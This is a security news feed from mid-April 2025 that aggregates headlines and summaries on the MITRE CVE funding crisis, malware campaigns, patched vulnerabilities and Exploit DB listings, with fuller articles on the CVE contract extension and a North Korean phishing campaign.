After threatening to slash support for the CVE program, CISA threw MITRE a lifeline at the last minute — extending its government contract for another 11 months. After that, it looks like it's up to the private sector to find the cash to keep it going.
by Dark Reading
2025-04-17 15:32:56
Tor Browser 14.5 Brings Censorship-Busting Connection Assist to Android
The Tor Project has released version 14.5 of its privacy-focused browser, introducing the long-awaited Connection Assist feature to Android. This update significantly enhances the usability of Tor in regions where the network is actively blocked, alongside improvements in localization and overall stability across platforms. Tor Browser is the flagship tool developed by The Tor Project, …
by Cyber Insider
2025-04-17 15:00:00
New Jersey Sues Discord for Allegedly Failing to Protect Children
The New Jersey attorney general claims Discord’s features to keep children under 13 safe from sexual predators and harmful content are inadequate.
by WIRED Security News
2025-04-17 14:45:54
CVE wake-up call: What’s ahead after the MITRE funding fiasco
In a stunning development, the security world as we knew it spiraled into disarray on April 15, 2025, after MITRE...
by Sysdig
2025-04-17 14:27:00
Node.js Malware Campaign Targets Crypto Users with Fake Binance and TradingView Installers
Microsoft is calling attention to an ongoing malvertising campaign that makes use of Node.js to deliver malicious payloads capable of information theft and data exfiltration. The activity, first detected in October 2024, uses lures related to cryptocurrency trading to trick users into installing a rogue installer from fraudulent websites that masquerade as legitimate software like Binance or
by The Hacker News
2025-04-17 13:49:43
Cybersecurity by Design: When Humans Meet Technology
If security tools are challenging to use, people will look for workarounds to get around the restrictions.
by Dark Reading
2025-04-17 13:35:05
Emulating the Stealthy StrelaStealer Malware
AttackIQ has released three new attack graphs designed to emulate the Tactics, Techniques, and Procedures (TTPs) associated with StrelaStealer observed in its most recent activities, enabling defenders to test and validate their detection and response capabilities.
by AttackIQ
2025-04-17 13:00:00
Proton66 Part 2: Compromised WordPress Pages and Malware Campaigns
Earlier this year SpiderLabs observed an increase in mass scanning, credential brute forcing, and exploitation attempts originating from the Proton66 ASN targeting organizations worldwide, which we are discussing in a two-part series.
by SpiderLabs Blog
2025-04-17 12:27:17
UNC5221’s Latest Exploit: Weaponizing CVE-2025-22457 in Ivanti Connect Secure
Who Is the China-Nexus Group UNC5221?
UNC5221 is a suspected China-nexus cyber-espionage group known for aggressively targeting edge network devices (VPNs, firewalls, routers) with zero-day exploits since at least 2023 [1]. The group has repeatedly compromised Ivanti’s Pulse Connect Secure/Ivanti Connect Secure (ICS) VPN appliances through multiple vulnerabilities, demonstrating a knack for quickly leveraging new flaws.
by Picus Security
2025-04-17 11:14:00
Older SonicWall SMA100 vulnerability exploited in the wild
CISA added the high-severity flaw, initially disclosed in 2021, to its known exploited vulnerabilities catalog this week.
by Cybersecurity Dive
2025-04-17 11:14:00
CISA Flags Actively Exploited Vulnerability in SonicWall SMA Devices
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a security flaw impacting SonicWall Secure Mobile Access (SMA) 100 Series gateways to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The high-severity vulnerability, tracked as CVE-2021-20035 (CVSS score: 7.2), relates to a case of operating system command injection
by The Hacker News
2025-04-17 10:30:00
This ‘College Protester’ Isn’t Real. It’s an AI-Powered Undercover Bot for Cops
Massive Blue is helping cops deploy AI-powered social media bots to talk to people they suspect are anything from violent sex criminals all the way to vaguely defined “protesters.”
by WIRED Security News
2025-04-17 10:00:01
Unmasking the new XorDDoS controller and infrastructure
Cisco Talos observed the ongoing global spread of the XorDDoS malware, predominantly targeting the United States, with evidence suggesting Chinese-speaking operators are using sophisticated tools to orchestrate widespread attacks.
by Cisco Talos Blog
2025-04-17 09:45:00
Tariff turmoil is making supply chain security riskier
Many businesses around the world are taking the decision to alter their supplier mix in the face of tariff uncertainty, but in doing so are creating more cyber risks for themselves, according to a report.
by ComputerWeekly
2025-04-17 09:45:00
Data-stealing cyberattacks are surging - 7 ways to protect yourself and your business
The number of infostealers sent through phishing emails jumped by 84% last year. IBM X-Force offers these recommendations for defending yourself from all manner of malware.
by ZDNET Security
2025-04-17 09:16:53
Update your iPhone now to patch a CarPlay glitch and two serious security flaws
Apple's iOS 18.4.1 update fixes a bug with wireless CarPlay and resolves two security holes already exploited in targeted attacks.
by ZDNET Security
2025-04-17 09:05:00
How Agile Shift-Left Is Revolutionizing Software Development
By moving testing, security, and code reviews earlier in the development cycle, Agile shift-left strategies — powered by automation and AI — reduce risks, cut costs, and boost software quality.
by ITPro Today
2025-04-17 09:03:00
Apple Patches Two Actively Exploited iOS Flaws Used in Sophisticated Targeted Attacks
Apple on Wednesday released security updates for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS to address two security flaws that it said have come under active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2025-31200 (CVSS score: 7.5) - A memory corruption vulnerability in the Core Audio framework that could allow code execution when processing an audio
by The Hacker News
2025-04-17 09:00:00
An Introduction to SQL Commands, Part 1
This first installment of a three-part series introduces essential SQL commands for creating, modifying, and deleting tables within SQL Server Management Studio.
by ITPro Today
2025-04-17 08:15:00
Collaboration is the best defence against nation-state threats
The rise of DeepSeek has prompted the usual well-documented concerns around AI, but also raised worries about its potential links to the Chinese state. The Security Think Tank considers the steps security leaders can take to counter threats posed by nation-state industrial espionage.
by ComputerWeekly
2025-04-17 08:00:27
IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia
The MysterySnail RAT, attributed to the IronHusky APT group, hasn’t been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.
by Securelist
2025-04-17 07:08:09
CISA warns companies to secure credentials amid Oracle Cloud breach claims
The agency is asking organizations to come forward if they detect suspicious activity or other evidence of a compromise.
by Cybersecurity Dive
2025-04-17 06:31:00
Homograph attacks: How hackers exploit look-alike domains
Several years ago, a security researcher discovered a vulnerability in Google Chrome that allowed fake domains to bypass the browser's security measures. The researcher registered a domain that appeared as "xn--80ak6aa92e.com" but displayed as "apple.com" in the browser, demonstrating how easy it was to deceive users. This is just one example of what's known as […]
by Outpost24
2025-04-17 06:05:42
Russia expands its strategic footprint in occupied Abkhazia
The reopening of the decades-closed Sukhumi Babushara Airport and a test flight from Moscow demonstrate Russia's push for control over occupied Abkhazia.
by DFRLab
2025-04-17 06:00:00
Middle East, North Africa Security Spending to Top $3B
Gartner projects IT security spending in the MENA region will continue to increase in 2025, with security services accounting for the most growth.
by Dark Reading
2025-04-17 02:41:00
Force Multiply Your Security Team with Agentic AI: How the Industry's Only True Cyber AI Analyst™ Saves Time and Stops Threats
See how Darktrace Cyber AI Analyst™, an agentic AI virtual analyst, cuts through alert noise, accelerates threat response, and strengthens your security team, all without adding headcount.
by Darktrace
2025-04-17 02:30:00
GPS Spoofing Attacks Spike in Middle East, Southeast Asia
An Indian disaster-relief flight delivering aid is the latest air-traffic incident, as attacks increase in the Middle East and Myanmar and along the India-Pakistan border.
by Dark Reading
2025-04-17 00:00:00
CrowdStrike Falcon Cloud Security Adds Detections for AWS IAM Identity Center
by CrowdStrike
2025-04-17 00:00:00
[local] AnyDesk 9.0.1 - Unquoted Service Path
by Exploit DB
2025-04-17 00:00:00
[webapps] compop.ca 3.5.3 - Arbitrary Code Execution
by Exploit DB
2025-04-17 00:00:00
[webapps] Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation
by Exploit DB
2025-04-17 00:00:00
[webapps] Usermin 2.100 - Username Enumeration
by Exploit DB
2025-04-17 00:00:00
[webapps] Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)
by Exploit DB
2025-04-17 00:00:00
[hardware] ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal
by Exploit DB
2025-04-17 00:00:00
[hardware] ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution
by Exploit DB
2025-04-17 00:00:00
[remote] TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial of Service (DoS)
by Exploit DB
2025-04-17 00:00:00
[remote] TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption
by Exploit DB
2025-04-17 00:00:00
Iran's AI Ambitions: Balancing Economic Isolation with National Security Imperatives
Explore how Iran is leveraging AI for cyberwarfare, influence ops, military tech, and domestic surveillance. A deep dive into Tehran's top-down AI strategy, partnerships with China and Russia, and implications for global security.
by Recorded Future
2025-04-17 00:00:00
Discovering Your Baud
I'm still pretty new to hardware hacking and find myself going through a lot of media (both text and moving pictures) about various techniques to interact with IoT devices and hardware in general. One of the tasks for a…
by TrustedSec
2025-04-16 22:00:44
Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis
Agent Tesla, Remcos RAT and XLoader delivered via a complex phishing campaign. Learn how attackers are using multi-stage delivery to hinder analysis.
by Palo Alto Networks - Unit42
2025-04-16 21:48:00
New Windows Task Scheduler Bugs Let Attackers Bypass UAC and Tamper with Logs
Cybersecurity researchers have detailed four different vulnerabilities in a core component of the Windows task scheduling service that could be exploited by local attackers to achieve privilege escalation and erase logs to cover up evidence of malicious activities. The issues have been uncovered in a binary named "schtasks.exe," which enables an administrator to create, delete, query, change,
by The Hacker News
2025-04-16 21:35:00
Former CISA director Chris Krebs vows to fight back against Trump-ordered federal investigation
The former cybersecurity chief is the latest to push back on the Trump administration's targeting of critics and dissenters.
by TechCrunch
2025-04-16 21:25:24
Multiple Groups Exploit NTLM Flaw in Microsoft Windows
The attacks have been going on since shortly after Microsoft patched the vulnerability in March.
by Dark Reading
2025-04-16 21:25:23
Hi, robot: Half of all internet traffic now automated
Bots now account for half of all internet traffic, according to a new study that shows how non-human activity has grown online.
by Malwarebytes Labs
2025-04-16 20:58:10
China-Linked Hackers Lay Brickstorm Backdoors on Euro Networks
Researchers discovered new variants of the malware, which is tied to a China-nexus threat group, targeting Windows environments of critical infrastructure networks in Europe.
by Dark Reading
2025-04-16 20:16:29
Save our CVE! Last minute rescue for critical cybersecurity service
At the last possible moment, CISA confirms funding for the CVE program for another eleven months.
by ThreatDown
2025-04-16 20:10:07
Ransomware gang 'CrazyHunter' Targets Critical Taiwanese Orgs
Trend Micro researchers detailed an emerging ransomware campaign by a new group known as "CrazyHunter" that is targeting critical sectors in Taiwan.
by Dark Reading
2025-04-16 20:10:04
'Stupid and Dangerous': CISA Funding Chaos Threatens Essential Cybersecurity Program
The CVE Program is the primary way software vulnerabilities are tracked. Its long-term future remains in limbo even after a last-minute renewal of the US government contract that funds it.
by WIRED Security News
2025-04-16 19:54:19
NIST Updates Privacy Framework With AI and Governance Revisions
Changes aim to tighten integration with the National Institute of Standards and Technology's Cybersecurity Framework and help organizations develop a stronger posture to handle privacy risks.
by Dark Reading
2025-04-16 19:34:39
Why the CVE database for tracking security flaws nearly went dark - and what happens next
Expired US government funding nearly disrupted this global security system. How can we prevent this from happening again in 11 months?
by ZDNET Security
2025-04-16 19:02:35
Retail & Hospitality ISAC Announces 2025 Award Winners
VIENNA, VA (April 14, 2025) – The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) announced its 2025 award winners during the annual membership meeting held on 9 April in St. Louis, Missouri. The awards recognize outstanding companies and individuals who have displayed extraordinary dedication to RH-ISAC's mission to build a collaborative sharing community...
by RH-ISAC
2025-04-16 18:45:00
Apple says zero-day bugs exploited against 'specific targeted individuals' using iOS
One of the bugs was discovered by Google's security researchers who investigate government-backed cyberattacks.
by TechCrunch
2025-04-16 18:18:00
Google Blocked 5.1B Harmful Ads and Suspended 39.2M Advertiser Accounts in 2024
Google on Wednesday revealed that it suspended over 39.2 million advertiser accounts in 2024, with a majority of them identified and blocked by its systems before it could serve harmful ads to users. In all, the tech giant said it stopped 5.1 billion bad ads, restricted 9.1 billion ads, and blocked or restricted ads on 1.3 billion pages last year. It also suspended over 5 million accounts for
by The Hacker News
2025-04-16 18:15:26
CVE program's funding crisis: Implications and strategic response
Today, the cybersecurity community faced a critical juncture as the U.S. government's contract with MITRE Corporation to develop, operate and modernize the Common Vulnerabilities and Exposures (CVE) program, as well as related efforts like CWE, was set to expire.
by Barracuda
2025-04-16 17:14:00
Gamma AI Platform Abused in Phishing Chain to Spoof Microsoft SharePoint Logins
Threat actors are leveraging an artificial intelligence (AI) powered presentation platform named Gamma in phishing attacks to direct unsuspecting users to spoofed Microsoft login pages. "Attackers weaponize Gamma, a relatively new AI-based presentation tool, to deliver a link to a fraudulent Microsoft SharePoint login portal," Abnormal Security researchers Callie Hinman Baron and Piotr Wojtyla
by The Hacker News
2025-04-16 16:56:00
From Third-Party Vendors to U.S. Tariffs: The New Cyber Risks Facing Supply Chains
Cyber threats targeting supply chains have become a growing concern for businesses across industries. As companies continue to expand their reliance on third-party vendors, cloud-based services, and global logistics networks, cybercriminals are exploiting vulnerabilities within these interconnected systems to launch attacks. By first infiltrating a third-party vendor with undetected
by The Hacker News
2025-04-16 16:33:58
Patch Now: NVIDIA Flaws Expose AI Models, Critical Infrastructure
A fix for a critical flaw in a tool allowing organizations to run GPU-accelerated containers released last year did not fully mitigate the issue, spurring the need to patch a secondary flaw to protect organizations that rely on NVIDIA processors for AI workloads.
by Dark Reading
2025-04-16 16:13:48
How Does Human Risk Management Differ from Security Awareness Training?
In today's cybersecurity landscape, organizations face an ever-present and often underestimated threat: human risk. Despite significant advancements in technological defenses, human error remains a leading cause of data breaches and security incidents.
by KnowBe4
2025-04-16 16:13:09
AI-Powered Spear Phishing Can Now Outperform Human Attackers
Researchers at Hoxhunt have found that AI agents can now outperform humans at creating convincing phishing campaigns.
by KnowBe4
2025-04-16 16:07:00
New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks
Cybersecurity researchers have unearthed a new controller component associated with a known backdoor called BPFDoor as part of cyber attacks targeting telecommunications, finance, and retail sectors in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt in 2024. "The controller could open a reverse shell," Trend Micro researcher Fernando Mercês said in a technical report published earlier in
by The Hacker News
2025-04-16 16:01:32
How Apple plans to train its AI on your data without sacrificing your privacy
Apple's solution is called 'differential privacy' - and it's already been using it for Genmojis.
by ZDNET Security
2025-04-16 16:00:00
Product Walkthrough: A Look Inside Wing Security's Layered SaaS Identity Defense
Intro: Why hack in when you can log in? SaaS applications are the backbone of modern organizations, powering productivity and operational efficiency. But every new app introduces critical security risks through app integrations and multiple users, creating easy access points for threat actors. As a result, SaaS breaches have increased, and according to a May 2024 XM Cyber report, identity and
by The Hacker News
2025-04-16 15:41:02
NSO lawyer names Mexico, Saudi Arabia, and Uzbekistan as spyware customers accused of 2019 WhatsApp hacks
This is the first time representatives for the spyware maker have publicly named its government customers.
by TechCrunch
2025-04-16 15:38:07
Cloud, Cryptography Flaws in Mobile Apps Leak Enterprise Data
Cloud misconfigurations and cryptography flaws plague some of the top apps used in work environments, exposing organizations to risk and intrusion.
by Dark Reading
2025-04-16 15:34:56
Frequently Asked Questions About the MITRE CVE Program Expiration and Renewal
Concerns about the future of the MITRE CVE Program continue to circulate. The Tenable Security Response Team has created this FAQ to help provide clarity and context around this developing situation.

Background
The Tenable Security Response Team has compiled this blog to answer Frequently Asked Questions (FAQ) regarding changes around the MITRE CVE Program. As the situation continues to evolve, we will continue to provide updates as new information is released.

FAQ
What is the current status of the MITRE CVE Program?
As of April 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has extended funding for the MITRE CVE Program for one year. In a post and update to their website, CISA confirmed the extension, and a spokesperson added that they "executed the option period on the contract to ensure there will be no lapse in critical CVE services." (Cybersecurity and Infrastructure Security Agency, @CISAgov, April 16, 2025)

When did CVE Board Members find out about the expiration of the MITRE CVE Program and other related programs?
CVE Board members received a notification from MITRE on April 15, 2025. This notification was circulated on social media and picked up in news articles. Tenable published a blog post about the forthcoming expiration and updated it on April 16 upon news of the subsequent renewal.

What is the importance of the CVE Program?
The CVE Program provides the industry with a common identifier used for identifying vulnerabilities which in turn allows the industry to fully track all affected products, remediations, tactics, techniques and procedures (TTPs) and risk measurements for a vulnerability. Without this we run the risk of being unable to accurately map active exploitation and associated risk to that vulnerability.
One important function that the CVE program serves is to operate as a CVE Naming Authority (CNA) of last resort, particularly when there are disputes over CVE issuance. This helps to minimize conflicting reports and duplicate records.

What is the value of having a CVE Naming Authority (CNA)?
The CVE Program enables various entities to become a CNA. The CNA program allows vendors, researchers, open source developers and others to reserve and assign CVEs while providing information about a vulnerability. Currently there are over 450 CNAs that participate in the CVE Program.

What is Tenable's relationship with the CVE Program?
Tenable is a CNA within the CVE Program and, as such, issues CVEs for its own products and vulnerabilities in other products discovered by its research team for which there is no CNA.

What about the announcements of efforts from the CVE Foundation and GCVE?
On the morning of April 16, 2025, the CVE Foundation published a press release regarding an effort for transitioning the CVE program to a non-profit foundation established by active CVE Board members. The CVE Foundation aims to move the CVE Program away from a government-funded project to eliminate the risk of "a single point of failure in the vulnerability management ecosystem."
Additionally, we are aware of other efforts being launched, including the Global CVE (GCVE) allocation system by the Computer Incident Response Center Luxembourg (CIRCL). According to their FAQ, GCVE is a "decentralized system for identifying and numbering security vulnerabilities." The GCVE site notes that existing CNAs can become GCVE Numbering Authorities (GNAs) and would have autonomy to define their own policies for the identification of vulnerabilities.
Tenable will continue to monitor these evolving efforts surrounding CVE and other programs and update the community as we learn more.

How is Tenable impacted by the interruptions to CVE issuance at both MITRE and the National Vulnerability Database (NVD)?
With uncertainty around interruptions to the CVE Program, Tenable has reserved a sufficient number of CVEs for disclosing vulnerabilities in our products and those discovered in other products.
Tenable is not dependent on either MITRE or NVD for sourcing the logic needed to determine if a product is vulnerable or not. We source our coverage from vendor advisories, which will enable us to continue providing coverage as long as vendors publish security advisories.

Get more information
Tenable Blog: MITRE CVE Program Funding Extended For One Year
Tenable Blog: Recent NVD Delays Won't Affect Tenable Vulnerability Management Customers Thanks To Our Diverse Scoring Sources
CVE Foundation
Global CVE Allocation System (GCVE)
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2025-04-16 15:22:00
Spotify goes down: What we know, plus our favorite alternatives to try
The company is investigating.
by ZDNET Security
2025-04-16 14:53:47
"I sent you an email from your email account," sextortion scam claims
A new variant of the hello pervert emails claims that the target's system is infected with njRAT and spoofs the victim's email address.
by Malwarebytes Labs
2025-04-16 14:42:51
Responsible vulnerability disclosure: Why it matters
The concept of responsible disclosure is a simple one. If you find a vulnerability, you let the affected organization or software vendor know before making the information public. This gives them time to patch the vulnerability before it can be exploited. It also helps maintain trust and fosters a collaborative environment between security researchers and […]
by Outpost24
2025-04-16 14:35:05
MITRE CVE Contract Extended Just Before Expiration
The Common Vulnerabilities and Exposures (CVE) Program is one of the most central programs in cybersecurity, so news that MITRE's contract to run the program was expiring sent shock waves through the cybersecurity community on April 15. But fears for the future of the globally recognized program underpinning vulnerability management were assuaged when CISA announced today that it was extending the MITRE CVE contract. The extension apparently is for 11 months, sources told The Cyber Express.
In a statement today to The Cyber Express, a spokesperson for the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said: "The CVE Program is invaluable to cyber community and a priority of CISA. Last night, CISA executed the option period on the contract to ensure there will be no lapse in critical CVE services. We appreciate our partners' and stakeholders' patience."
It's not clear what the long-term future of the CVE program will be – CISA had floated the idea of bringing it in-house despite its own budget and staffing cuts – but at least for now, the program will continue as is.

MITRE CVE Contract Raises Cybersecurity Concerns
The panic started on April 15 with news of a letter to the CVE Board from Yosry Barsoum, Vice President and Director of MITRE's Center for Securing the Homeland, warning of the contract's imminent expiration. "If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure," Barsoum wrote (image below).
(Image: MITRE CVE contract letter)
MITRE released this statement in response to media inquiries: "On Wednesday, April 16, 2025, funding for MITRE to develop, operate, and modernize the Common Vulnerabilities and Exposures (CVE) Program and related programs, such as the Common Weakness Enumeration (CWE) Program, will expire. The government continues to make considerable efforts to support MITRE's role in the program and MITRE remains committed to CVE as a global resource."
MITRE noted how valuable the program is to a wide range of cybersecurity services: "The CVE Program anchors a growing cybersecurity vendor market worth more than $37 billion, providing foundational data to vendor products across vulnerability management, cyber threat intelligence, security information and event management, and endpoint detection and response."
MITRE said historical CVE records will be available on GitHub at https://github.com/CVEProject, and also directed those seeking more information to visit the official CVE.org website.
In response to news of the 11-month contract extension, Barsoum released the following statement today: "Thanks to actions taken by the government, a break in service for the Common Vulnerabilities and Exposures (CVE) Program and the Common Weakness Enumeration (CWE) Program has been avoided. As of Wednesday morning, April 16, 2025, CISA identified incremental funding to keep the Programs operational. We appreciate the overwhelming support for these programs that have been expressed by the global cyber community, industry, and government over the last 24 hours. The government continues to make considerable efforts to support MITRE's role in the program and MITRE remains committed to CVE and CWE as global resources."

CVE Foundation, EU Vulnerability Database Launched
Amid the uncertainty, a non-profit CVE Foundation has been launched by several CVE Board members "to ensure the long-term viability, stability, and independence of the Common Vulnerabilities and Exposures (CVE) Program." "The new CVE Foundation will focus solely on continuing the mission of delivering high-quality vulnerability identification and maintaining the integrity and availability of CVE data for defenders worldwide," the group stated.
"CVE, as a cornerstone of the global cybersecurity ecosystem, is too important to be vulnerable itself," stated Kent Landfield, an officer of the Foundation. "Cybersecurity professionals around the globe rely on CVE identifiers and data as part of their daily work—from security tools and advisories to threat intelligence and response. Without CVE, defenders are at a massive disadvantage against global cyber threats."
The EU also launched its own vulnerability database in response to the uncertainty.

Easterly: Serious Implications for Business Risk
In an April 15 post on LinkedIn, former CISA Director Jen Easterly said news of the MITRE contract expiration was "rightly raising alarms across the cybersecurity community. While this may sound like a technical issue, it has SERIOUS implications for business risk, operational resilience, and national security."
"The CVE system may not make headlines, but it is one of the most important pillars of modern cybersecurity," she added.
Any disruption would also come amid an enduring backlog in processing CVEs in the National Vulnerability Database (NVD) at the National Institute of Standards and Technology (NIST). With more than 40,000 new vulnerabilities discovered last year, NIST continues to struggle with the volume of new vulnerabilities.
by The Cyber Express
2025-04-16 14:13:48
Memory Safety Bugs: An In-Depth Look At Critical Issues
Memory safety vulnerabilities remain among the most widespread and exploited security issues. They occur in C and C++ projects, which are widely used across embedded systems, including automotive, medical devices, and avionics. Read on to learn why they can happen and how to prevent them. Contents: What Are Memory Safety Issues; Why Memory Safety Matters; Real-World Examples of Memory Corruption; Example of a Memory Safety Bug; How to Detect Memory Corruption.
by Code Intelligence
2025-04-16 14:00:00
Communicating Security to the C-Suite: A Strategic Approach
Engaging with the C-suite is not just about addressing security concerns or defending budget requests. It's about establishing and maintaining an ongoing discussion that aims to align security objectives with the interests of the business.
by Black Hills Information Security
2025-04-16 14:00:00
Active Directory Recovery Can't Be an Afterthought
Active Directory is one of the most vulnerable access points in an organization's IT environment. Companies cannot wait for a real attack to pressure-test their AD recovery strategy.
by Dark Reading
2025-04-16 13:46:48
CVE-2025-24054, NTLM Exploit in the Wild
NTLM (New Technology LAN Manager) is a suite of authentication protocols developed by Microsoft to verify user identities and protect the integrity and confidentiality of network communications. NTLM operates through a direct client-server exchange known as the NTLM challenge/response mechanism, in which the server challenges the client to prove its identity without […]
by Check Point Research
2025-04-16 13:45:00
Kubernetes 1.33 – What's new?
Introducing Kubernetes 1.33: Cloud-native improvements for dev and security teams. The Kubernetes 1.33 release continues the project's momentum in delivering...
by Sysdig
2025-04-16 13:25:47
Introducing Version 2 of Darktrace's Embedding Model for Investigation of Security Threats (DEMIST-2)
Learn how Darktrace's DEMIST-2 embedding model delivers high-accuracy threat classification and detection across any environment, outperforming larger models with efficiency and precision.
by Darktrace
2025-04-16 13:21:28
AI Uncovered: Introducing Darktrace Incident Graph Evaluation for Security Threats (DIGEST)
Discover how Darktrace's new DIGEST model enhances Cyber AI Analyst by using GNNs and RNNs to score and prioritize threats with expert-level precision before damage is done.
by Darktrace
2025-04-16 13:04:00
Chinese Android Phones Shipped with Fake WhatsApp, Telegram Apps Targeting Crypto Users
Cheap Android smartphones manufactured by Chinese companies have been observed pre-installed with trojanized apps masquerading as WhatsApp and Telegram that contain cryptocurrency clipper functionality as part of a campaign since June 2024. While using malware-laced apps to steal financial information is not a new phenomenon, the new findings from Russian antivirus vendor Doctor Web point to
by The Hacker News
2025-04-16 13:01:47
Making Your Cold Emails Relevant 101
Relevance is the #1 most important factor in determining whether or not your cold email will generate a reply. This article covers how to source your B2B lead data and how to leverage it to send truly relevant emails.
by The Hunter Blog
2025-04-16 12:58:00
Bill extends cyber threat info-sharing between public, private sector
The Cybersecurity Information Sharing Act of 2015, set to expire in September, "moved the needle."
by Cybersecurity Dive
2025-04-16 12:00:06
Eclipse and STMicroelectronics vulnerabilities
Cisco Talos' Vulnerability Discovery & Research team recently disclosed three vulnerabilities found in Eclipse ThreadX and four vulnerabilities in STMicroelectronics. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco's third-party vulnerability disclosure policy.
by Cisco Talos Blog
2025-04-16 11:40:59
Sophos India Volunteers Bring Color to Local Schools
Sophos India volunteers transformed two rural schools with vibrant murals, enhancing learning spaces and strengthening community ties.
by Sophos News
2025-04-16 11:37:21
Mitre CVE program regains funding as renewal deal reached
The information security industry feared a lapse would lead to industrywide exposures of software vulnerabilities.
by Cybersecurity Dive
2025-04-16 11:16:00
CISA extends Mitre CVE contract at last moment
The US Cybersecurity and Infrastructure Security Agency has ridden to the rescue of the under-threat Mitre CVE Programme, approving a last-minute, 11-month contract extension to preserve the project's vital security vulnerability work.
by ComputerWeekly
2025-04-16 10:45:00
CVE Foundation pledges continuity after Mitre funding cut
With news that Mitre's contract to run the world-renowned CVE Programme is abruptly terminating, a breakaway group is setting up a non-profit foundation to try to ensure the project's continuity.
by ComputerWeekly
2025-04-16 10:37:24
North Korean Hackers Targeted Nearly 18,000 in Phishing Campaign During Martial Law TurmoilNorth Korean hackers sent more than 120,000 phishing emails to nearly 18,000 individuals over a three-month campaign that impersonated South Korea’s Military Counterintelligence Command''s communication during the Martial Law turmoil, the National Police Agency said Wednesday. The campaign began in November 2024 and continued through January 2025, targeting professionals in the unification, defense, national security, and foreign affairs sectors. Police confirmed North Korea''s involvement through forensic analysis of the phishing infrastructure, IP addresses, and language patterns tied to past operations. “Our investigation has confirmed that North Korea was behind the emails distributed on Dec. 11, 2024, bearing the subject line, ‘Disclosure of Defense Counterintelligence Command Martial Law Documents,’” Kim Young-woon, head of the agency’s cyber terrorism unit, said during the press briefing. “Historically, North Korea would send hand-crafted emails impersonating analysts or experts, offering geopolitical forecasts or New Year’s speech analyses,” Kim said. “Now, they’ve automated the process, enabling mass distribution.” Authorities said at least 570 individuals clicked on the phishing bait and likely exposed sensitive data, including emails and contact lists. Recycled Infrastructure and Targeted Deception The hackers used 15 overseas servers rented through foreign providers and deployed custom-built malware capable of tracking real-time metrics. Investigators said the malware that looked to be an info-stealer monitored whether emails were opened, if users clicked on embedded links, and whether they submitted account credentials. North Korea reused servers previously identified in earlier state-backed cyberattacks. The infrastructure also showed evidence of searches for North Korean defector data and South Korean military information. 
Browser logs included North Korean dialects, strengthening attribution. Each phishing email mimicked government alerts or official communication. Subject lines included fake military documents, New Year’s policy analyses, and even invitations to concerts by South Korean celebrities. Others posed as tax refunds, horoscope readings, or health advisories. Deceptive Links Spread Under the Guise of Martial Law Deployment The emails directed users to spoofed login portals that closely resembled major South Korean web services like Naver, Kakao, and even Google. Domains included subtle misspellings or character swaps—such as googlauth.com, naver-auth.com, or baernin.com. Many email addresses appeared to come from government domains or closely resembled personal contacts. Spoofing methods included: Adding terms like -news, -noreply, or -report to legitimate domains. Mimicking friends’ or colleagues’ addresses with subtle variations (e.g., adding a single letter). Using lookalike domain names with common misspellings (m as rn, or co.kr altered to co.kro.kr). Out of the 17,744 recipients, 120 individuals fell for the phishing attempt, entering their credentials and granting attackers access to inbox contents and stored contact information. Warnings to the Public The South Korean government urged the public to remain vigilant against phishing threats, especially those disguised as official communication. Authorities advised against opening unfamiliar emails, clicking suspicious links, or downloading unverified attachments. “Never input your ID or password without verifying the legitimacy of the request,” the police warned. “Look carefully at the email sender and website domain. Even minor differences can signal fraud.” Officials also recommended regularly reviewing account login histories and enabling multi-factor authentication wherever possible. 
A Coordinated, Persistent Threat The investigation showed that the phishing campaign was both well-organized and sustained, reflecting a broader pattern in North Korea's cyber playbook. Previous incidents linked to Pyongyang include attacks on cryptocurrency platforms, espionage efforts targeting defense sectors, and global disinformation operations. South Korean authorities reiterated their readiness to respond decisively to any form of cyber aggression. The police pledged enhanced coordination with international partners and local cybersecurity agencies. “We are mobilizing our full law enforcement capability,” the police chief said. “Cyberthreats, especially those linked to hostile nations, will be met with swift and strong responses.” Public Disclosure Justified Under South Korea's Public Information Rules on Criminal Investigations, the case was disclosed to the media to help prevent similar attacks. The government cited two justifications: the need to prevent recurrence by informing the public of phishing tactics, and the importance of limiting the spread of harm by raising awareness. This disclosure falls in line with past efforts to inform citizens of advanced cyber threats, particularly those involving national security and public institutions. Ongoing Investigations The investigation remains open as cybersecurity experts continue tracking North Korea's infrastructure and tactics. South Korea's Cyber Terror Response Division is working closely with the Korea Internet & Security Agency (KISA) and other international stakeholders. Police urged anyone who suspects they received a spoofed message to report it immediately to national authorities and avoid interacting with the email in any way. “Cybersecurity is a collective effort,” the police said. “Every report helps us build a stronger defense against these malicious campaigns.”
by The Cyber Express
2025-04-16 10:36:00
U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on AlertThe U.S. government funding for non-profit research giant MITRE to operate and maintain its Common Vulnerabilities and Exposures (CVE) program will expire Wednesday, an unprecedented development that could shake up one of the foundational pillars of the global cybersecurity ecosystem. The 25-year-old CVE program is a valuable tool for vulnerability management, offering a de facto standard to
by The Hacker News
2025-04-16 10:33:45
